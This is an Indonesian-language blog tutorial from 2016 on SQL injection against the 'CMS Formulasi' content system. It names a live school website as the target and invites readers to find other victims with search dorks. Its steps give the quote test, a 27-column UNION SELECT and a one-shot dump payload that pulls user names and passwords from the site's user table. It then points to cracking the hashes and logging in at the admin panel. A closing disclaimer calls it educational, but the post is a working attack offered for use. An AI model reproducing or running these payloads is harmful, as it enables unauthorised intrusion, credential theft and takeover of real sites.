Jumat, 02 September 2016

Tutorial Injeksi CMS Formulasi dengan $_post SQLI

setelah lama ga update blog tutorial sqli kembali hadir dengan tutorial sql injection. kali ini kita akan bahas cara injeksi pada salah satu cms buatan asli indonesia yaitu cms formulasi. cms ini ternyata memilik celah pada salah satu form pencariannya.

bahan yang di perlukan.
  • Komputer (wajib)
  • koneksi internet
  • advance hackbar ( donlod di sini ) kenapa saya menggunakan advace hackbar ini karena di dalamnya sudah include dengan DIOS (dump in one shoot) serta di lengkapi dengan tambahan query untuk membypass waf. jadi lebih mudah dalam melakukan injeksi.
  • ikat kepala warna putih,kopi, cemilan dan rokok sampoerna mint (optional) :D
ok kita mulai.. di sini saya sudah menyiapkan live target yaitu http://smkn1-kedawung.sch.id/smea/kelas-siswa.html . bagi teman teman yang lain silahkan mancari target lain. dork bisa kalian racik sendiri. di sini saya hanya akan memberikan tutorial injeksinya saja.

kita donlod dulu hackbarnya di sini advancehackbar kemudian klik allow trus install. restart browser anda

  1.  kita buka web http://smkn1-kedawung.sch.id/smea/kelas-siswa.html kemudia pada form kelas kita pilih salah satu jenis kelas. perhatikan gambar di bawah
  2. kemudian kita aktifkan hackbar yang udah kita pasang tadi dengan menekan tombol f9. kemudian load url dan post data kita centang.
  3. terlihat parameter kelas=10 pada post data. kita cek dengan menambahkan tanda kutip (') .. yups.. terjadi error. berarti injeksi dapat kita lanjutkan
  4. kita lakukan order by secara berurutan hingga menemukan error. kelas=10' order by 1#  oya untuk balancenya ita gunakan tanda pagar # (kress) bukan +--+
  5. di sini saya menemukan jumlah total kolom 27.lalu kita lanjutkan dengan union select kelas=1.0' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# muncul angka ajibnya yaitu 1,2,6,25.

  6. kita pilih salah satu angka yg muncul. di sini saya pilih angka 6. kita blok angka 6 pada hackbar trus kita klik union based , dios mysql , trus klik dios by madblodd . dannnnn..... terbuka semua table dan kolomnya :D
  7. kita pilih salah satu table yaitu rd3grz_users , kemudian kita masukan nama kolomnya , namausers,sandiusers menjadi kelas=1.0' UNION SELECT 1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(rd3grz_users)where@:=export_set(5,export_set(5,@,namausers,0x3c6c693e,2),sandiusers,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
untuk selanjutnya silahkan crack sendiri passwordnya menggunakan tool online yang banyak tersedia. untuk login adminnya secara default berada di adminpanel .

tutorial ini hanya untuk pembelajaran saja. segala resiko yang timbul akibat dari pemakaian exploit ini di luar tanggung jawab penulis.
Load disqus comments

0 komentar

Comments
0 Comments